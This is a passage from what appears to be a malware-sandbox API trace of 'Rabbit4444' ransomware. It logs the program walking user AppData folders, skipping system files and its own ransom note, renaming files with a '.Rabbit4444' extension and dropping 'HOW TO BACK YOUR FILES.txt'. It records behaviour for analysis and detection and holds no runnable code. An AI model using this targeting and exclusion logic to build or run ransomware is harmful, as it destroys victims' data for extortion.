(lpString="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203") returned 65 [0054.357] lstrlenW (lpString="Rabbit4444") returned 10 [0054.357] lstrcmpiW (lpString1="3475345203", lpString2="Rabbit4444") returned -1 [0054.357] lstrlenW (lpString=".dll") returned 4 [0054.357] lstrcmpiW (lpString1="5203", lpString2=".dll") returned 1 [0054.357] lstrlenW (lpString=".lnk") returned 4 [0054.357] lstrcmpiW (lpString1="5203", lpString2=".lnk") returned 1 [0054.357] lstrlenW (lpString=".ini") returned 4 [0054.357] lstrcmpiW (lpString1="5203", lpString2=".ini") returned 1 [0054.357] lstrlenW (lpString=".sys") returned 4 [0054.357] lstrcmpiW (lpString1="5203", lpString2=".sys") returned 1 [0054.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.357] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14566814568) returned 1 [0054.357] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=471) returned 1 [0054.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0054.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0054.358] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0054.359] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0054.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.360] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14567118769) returned 1 [0054.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0054.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0054.361] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.361] CloseHandle (hObject=0x298) returned 1 [0054.361] CloseHandle (hObject=0x278) returned 1 [0054.361] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203.Rabbit4444") returned 144 [0054.361] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203.rabbit4444"), dwFlags=0x1) returned 1 [0054.361] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdfedb1f6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdb011c96, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0xcee7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0054.361] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.361] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.361] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0054.361] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0054.362] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0054.362] lstrcpyW (in: lpString1=0x130ebc0, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0054.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0054.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0054.362] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0054.362] lstrlenW (lpString="Rabbit4444") returned 10 [0054.362] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0054.362] lstrlenW (lpString=".dll") returned 4 [0054.362] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0054.362] lstrlenW (lpString=".lnk") returned 4 [0054.362] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0054.362] lstrlenW (lpString=".ini") returned 4 [0054.362] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0054.362] lstrlenW (lpString=".sys") returned 4 [0054.362] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0054.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\77ec63bda74bd0d0e0426dc8f8008506"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.363] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.363] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14567334997) returned 1 [0054.363] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52967) returned 1 [0054.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0054.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0054.363] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd1f0, lpName=0x0) returned 0x298 [0054.364] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd1f0) returned 0x70000 [0054.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0054.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0054.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0054.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0054.368] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14567843813) returned 1 [0054.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0054.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0054.368] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.368] CloseHandle (hObject=0x298) returned 1 [0054.368] CloseHandle (hObject=0x278) returned 1 [0054.369] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444") returned 111 [0054.369] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\77ec63bda74bd0d0e0426dc8f8008506"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\77ec63bda74bd0d0e0426dc8f8008506.rabbit4444"), dwFlags=0x1) returned 1 [0054.369] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdff01446, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdff01446, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xca82ce2e, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0054.369] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0054.369] lstrcpyW (in: lpString1=0x130ebc0, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0054.369] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0054.370] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0054.370] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0054.370] lstrlenW (lpString="Rabbit4444") returned 10 [0054.370] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0054.370] lstrlenW (lpString=".dll") returned 4 [0054.370] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0054.370] lstrlenW (lpString=".lnk") returned 4 [0054.370] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0054.370] lstrlenW (lpString=".ini") returned 4 [0054.370] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0054.370] lstrlenW (lpString=".sys") returned 4 [0054.370] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0054.370] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\fb0d848f74f70bb2eaa93746d24d9749"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.370] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.370] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14568107013) returned 1 [0054.370] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7796) returned 1 [0054.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0054.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0054.370] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2180, lpName=0x0) returned 0x298 [0054.372] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2180) returned 0x70000 [0054.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0054.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0054.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0054.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0054.374] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14568519038) returned 1 [0054.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0054.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0054.375] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.375] CloseHandle (hObject=0x298) returned 1 [0054.375] CloseHandle (hObject=0x278) returned 1 [0054.375] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444") returned 111 [0054.375] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\fb0d848f74f70bb2eaa93746d24d9749"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\fb0d848f74f70bb2eaa93746d24d9749.rabbit4444"), dwFlags=0x1) returned 1 [0054.375] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdff01446, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdff01446, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xca82ce2e, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0054.375] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0054.375] lstrcpyW (in: lpString1=0x130ebc0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.376] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.376] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.377] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.377] CloseHandle (hObject=0x278) returned 1 [0054.377] CloseHandle (hObject=0x27c) returned 1 [0054.377] GetCurrentThreadId () returned 0xd98 [0054.377] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0054.377] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0054.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0054.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0054.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0054.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\" [0054.377] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\.BFC0E91B00AE8A0620D3" [0054.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.379] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.381] FlushFileBuffers (hFile=0x27c) returned 1 [0054.382] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.382] CloseHandle (hObject=0x27c) returned 1 [0054.383] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned 38 [0054.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.383] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9bcc631, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0054.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.383] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.383] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.383] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9bcc631, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.383] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.383] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.383] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.383] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.383] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.383] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9bcc631, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9bcc631, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9bcc631, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.383] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.383] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.383] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="Rabbit4444.exe") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0054.384] lstrcmpiW (lpString1="Acrobat", lpString2="NTUSER.DAT") returned -1 [0054.384] lstrcpyW (in: lpString1=0x130eb86, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0054.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0054.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, 